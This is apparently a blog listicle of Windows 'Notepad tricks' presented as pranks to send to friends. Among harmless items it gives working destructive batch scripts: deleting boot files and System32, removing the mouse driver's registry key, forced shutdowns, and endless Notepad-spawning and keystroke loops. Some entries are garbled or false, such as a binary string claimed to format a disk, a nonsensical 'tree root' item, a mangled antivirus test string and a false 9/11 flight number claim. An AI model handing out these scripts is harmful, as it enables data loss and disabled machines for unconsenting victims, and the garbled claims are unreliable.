BestcodesComputerHacksNotepadNotepad TricksTipsTopTop ListTricks

20+ Best Notepad Tricks, Hacks & Commands in 2023

Today we are here with the latest notepad tricks and commands. These tricks are very simple and easy to implement. With these tricks you can have a lot of fun with your friends. Just follow the post below to proceed.

Notepad is a utility for the Windows operating system. This utility software helps to code various programs that can even control the operation of the system, allowing you to perform many tricks. These tricks are exciting and you can use these tricks to prank your friends.

We mainly use Notepad for typing, but this post will change your experience with Notepad. These tricks are very simple and easy to implement. With these tricks you can have a lot of fun with your friends. Just follow the post below to proceed.

Also Read: Best PC Tricks and PC Hacks

Best Notepad tricks, hacks and commands

You will have a lot of fun. Just read all the tricks given below. You need to copy the code from here and paste it into Notepad and save it with the “.bat” extension.

1) Notepad trick to test antivirus

By using this trick you can quickly test whether your antivirus is working perfectly or not.

X5O!P%@AP[4PZX54(P^) 7CC)7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*

Save it as test.exe and run the file and check if your antivirus detects it; then your antivirus is working perfectly; otherwise, change your antivirus.

2) Make A Personal Log-Book or A Diary

Copy the code below, paste it into Notepad, and save it as “log.txt”.

.LOG

Every time you open this log file, you will have all the log details with the date and time.

3) Constantly Repeat Any Messages

This is one of the Best Notepad tricks, repeatedly repeating any of the computer screen’s messages. Copy the below code, paste it into Notepad, and save it as “message.bat”.

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

4) Continually pop out the CD Drive Using Notepad

This is my favorite trick, as it continually pops out of the CD drive whenever you try to close it. Copy the code below, paste it into Notepad, and save it as “cd.vbs”.

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

5) Convey your friend a message and shut down their computer

Just copy the below code and paste into Notepad and save it as “anyname.bat”.

@echo off
msg * Hey how are you
shutdown -c “Error! You are a stupid!” -s

6) Notepad Trick to type slowly

This trick will let you type slowly on the screen, and to do so, copy the below code and save it with “anyname.vbs” name.

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject (“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate Notepad“”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

7) Matrix Effect

This code will give you a matrix effect on your screen just copy the below code and paste in Notepad and save it as “anyname.bat”.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

8) Format Hard Disk Using Just Notepad

This code will delete all your complex drive data. Just copy the below code and paste into Notepad and save it as “anyname.exe”.

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

9) Convert Text Into Audio Using Notepad

This is a very cool notepad trick, and this code will convert your text into an audio file. Just copy the below code and paste it into Notepad and save it as “text-to-audio.vbs”

Dim message, sapi message=InputBox(“Enter your text for conversion–Tech-viral”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message

10) Notepad Trick Print Tree Root

This trick is one of the Best Notepad Tricks that will print out a tree root on your screen. Just copy the below code, paste it into Notepad and save it as any name in C: windows system.

{print tree root}
C:windowssystem
{print C:windowssystemwinlog
4*43″[email protected][455]    3 hours 4 ~

Remark: To stop the “.vbs” files, press ALT+CTRL+DEL on your keyboard, open the Task Manager, process the section and stop the active Wscript file there.

11) Enable your Capslock

You can switch your keyboard’s Capslock key by typing the code in Notepad. Make sure to save the file as .vbs, open the saved file and see what happens while using Capslock Key.

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

12) False error message

Open Notepad, paste the code and save the file as error.vbs. When you open the saved file, you see an error message.

X=Msgbox(“Put your Message Here”,0+16,”Put Title Here”)

You can replace and post your message here and your title here with your keywords.

13) LED dance of keyboard with notepad

Open Notepad, enter the following code and save the file as “LEDDance.vbs”. As soon as you open the saved file, you will notice that all three LEDs of a keyboard will start flashing repeatedly.

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

14) Create a password protected file using notepad

We have published an article about this. Using our article Create a password protected folder without any software, you can create a password protected folder using Notepad. Read the post to know how.

15) Open Notepad continuously

This is the perfect prank to annoy your friend. You need to copy and paste the code into Notepad and save it under any name with a .bat extension. You can send it to your friend and make them click.

@ECHO OFF
:TOP
START %SYSTEMROOT%\SYSTEM32\NOTEPAD.EXE
GOTO TOP

16. World Trade Center Attack Trick

The flight number of the plane that hit the World Trade Center on 9/11 was Q33NY. You could call this trick a coincidence, but it will shock you.

1. Open Notepad and type ‘Q33N’ without the quotes in all caps.

2. Now increase the font size to 72 and change the font to Wingdings.

You will be shocked to discover the visuals.

17) Disable mouse controls

It would help if you had never tried this on your computer, as this method disables mouse control.

rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

Paste the above code into notepad and save it as disablemouse.bat on your computer.

18) Bush hid the facts

Well, this trick only works on the older version of Windows. You need to open Notepad and type “Bush Hid the Facts” or “This App Can Break”.

Save it and open it again. You see different characters instead of what you typed. Well, this is happening because of a bug present in the older version of Windows.

19) Change the header and footer in Notepad

Well, open Notepad and browse to File>Page Setup in Notepad, and type in the following codes in the header and footer fields.

Change the header and footer in note

&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number
&l Left-align the characters that follow

20) Press Enter continuously

With this trick you can use the enter button function to happen again and again. Well, you need to copy and paste the following code into Notepad:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

Save the file as a .vbs file format to see the magic.

21) Delete startup files

Well, this is something you should not try on your computer unless you are willing to lose all your data. This code removes the files that help your computer start up.

@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

Save the file in the .bat file format. It will shut down your computer and delete all important startup files. There is no rollback option. That’s why you need to know what you’re going to do. Do not use the code given above to harm anyone.

22) Press Backspace continuously

This is one of the funniest things you can do to annoy someone. This trick will keep you hitting backspace all the time. You need to copy and paste the given code below into the notepad file:

MsgBox “Backspace again and again and AGAIN”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

For it to work, you need to save the Notepad file in .vbs format. It would help if you used the task manager on Windows to stop the script.

23) Delete System32 files using Notepad

Well, this is another notepad trick to wreak havoc on a PC. This notepad trick removes System32 files that lead to system crashes. It is not recommended to implement the trick, but this code has the power to shut down any working computer in minutes.

DEL C:\WINDOWS\SYSTEM32\*.*/Q

Be sure to save the notepad file in the .bat file format.

24) Type each sentence over and over

This is another cool notepad trick that can be used to prank friends. This notepad trick writes everything down over and over again. Users have to close the process manually from the Task Manager to get out of the typing loop. Here’s the code.

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “I'll be typed again and again”
loop

Make sure to save the notepad file in .vbs file format.

25) Force windows to close

This is another notepad trick that will forcibly shut down your computer. You need to enter the given code in notepad and save it in .bat format. Here’s the code.

@echo off
shutdown computer
-c "sleep tight" -s

Make sure to save the notepad in .bat format.

Also Read: How To Create A Fake Harmless Virus Using Notepad

With these notepad tricks, you can easily prank your friends, have fun with them and have a great experience with the notepad. Hope you like the post, don’t forget to share it with your friends and leave a comment below about related questions.

Amir Hussain

Amir Hussain is the founder of Freemium World, a geek by nature and a professional Blog writer . I love to write about new technology trends, social media, hacking, blogging and much more.

Leave a Reply

Your email address will not be published. Required fields are marked *